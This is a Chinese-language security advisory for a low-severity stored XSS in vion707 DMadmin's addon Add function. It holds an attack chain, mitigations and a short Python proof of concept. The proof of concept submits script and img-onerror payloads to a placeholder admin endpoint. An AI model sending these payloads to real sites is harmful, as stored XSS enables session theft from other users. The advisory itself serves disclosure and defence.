CVE-2025-14722 vion707 DMadmin 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14722

漏洞类型

跨站脚本(XSS)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

vion707 DMadmin

漏洞概述

CVE-2025-14722是vion707 DMadmin系统中存在的一个存储型跨站脚本(XSS)漏洞。该漏洞影响vion707 DMadmin up to commit 3403cafdb42537a648c30bf8cbc8148ec60437d1版本。漏洞位于Admin/Controller/AddonsController.class.php文件的Add函数中，攻击者可利用Backend组件中的输入验证不足，在向服务器提交恶意构造的数据时注入恶意JavaScript代码。由于该漏洞为存储型XSS，恶意脚本会被永久存储在服务器端，当其他用户访问相关页面时，恶意代码会自动执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全问题。攻击者需要拥有高权限账户才能利用此漏洞，但一旦成功，可在用户不知情的情况下窃取认证凭证或执行任意客户端操作。该漏洞已公开披露，厂商在收到安全通报后未做出任何回应。

技术细节

该漏洞为存储型跨站脚本(CWE-79)漏洞，存在于vion707 DMadmin的Admin/Controller/AddonsController.class.php文件中的Add方法。攻击者通过在添加插件或扩展功能时，向Backend组件的Add函数提交包含恶意JavaScript代码的请求。由于服务端缺乏对用户输入的充分过滤和转义，恶意代码被直接存储到数据库中。当管理员或其他用户访问展示该插件信息的页面时，存储的恶意脚本会被浏览器解析执行。攻击者可利用此漏洞窃取受害者的Cookie信息、会话令牌，或在受害者浏览器中执行任意JavaScript代码。由于该系统采用滚动发布模式，版本信息不明确，增加了漏洞修复和版本追踪的难度。攻击者需要具有高权限(H)才能利用此漏洞，但成功利用后可对系统所有用户造成影响。

攻击链分析

STEP 1

步骤1

攻击者获取vion707 DMadmin的高权限账户访问权限

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的请求，发送到Admin/Controller/AddonsController.class.php的Add函数端点

STEP 3

步骤3

由于缺乏输入过滤，恶意XSS payload被存储到数据库中

STEP 4

步骤4

当其他管理员或用户访问插件列表页面时，存储的恶意脚本被浏览器解析执行

STEP 5

步骤5

攻击者通过XSS漏洞窃取用户Cookie、会话令牌或执行其他恶意客户端操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-14722 XSS PoC
# Target: vion707 DMadmin Backend AddonsController Add function

target_url = "http://target.com/Admin/Addons/Add"

# Malicious XSS payload
xss_payload = "<script>alert(document.cookie)</script>"

# Prepare the malicious request data
data = {
    "name": "malicious_addon" + xss_payload,
    "description": "<img src=x onerror=alert('XSS')>",
    "version": "1.0"
}

# If authentication is required
headers = {
    "Cookie": "PHPSESSID=your_session_here",
    "Content-Type": "application/x-www-form-urlencoded"
}

# Send the malicious request
response = requests.post(target_url, data=data, headers=headers)

print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

# The XSS payload will be stored and executed when the addon list is viewed

影响范围

vion707 DMadmin <= 3403cafdb42537a648c30bf8cbc8148ec60437d1

防御指南

临时缓解措施

在厂商发布修复版本之前，可采取以下临时缓解措施：1)限制Admin/Controller/AddonsController的访问权限，仅允许受信任的管理员访问；2)部署Web应用防火墙规则检测和阻止XSS攻击载荷；3)实施严格的输入过滤机制，对<、>、'、"等特殊字符进行转义处理；4)启用浏览器的XSS过滤器功能；5)对管理后台实施双因素认证以降低账户被盗风险；6)定期审查服务器日志，监控异常的JavaScript代码注入行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14722
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14722
3 Details https://www.cvedetails.com/cve/CVE-2025-14722/
4 VulDB https://vuldb.com/cve/CVE-2025-14722
5 Link https://github.com/DeepMountains/zzz/blob/main/CVE-2025-2-2.md
6 Link https://vuldb.com/?ctiid.336467
7 Link https://vuldb.com/?id.336467
8 Link https://vuldb.com/?submit.707130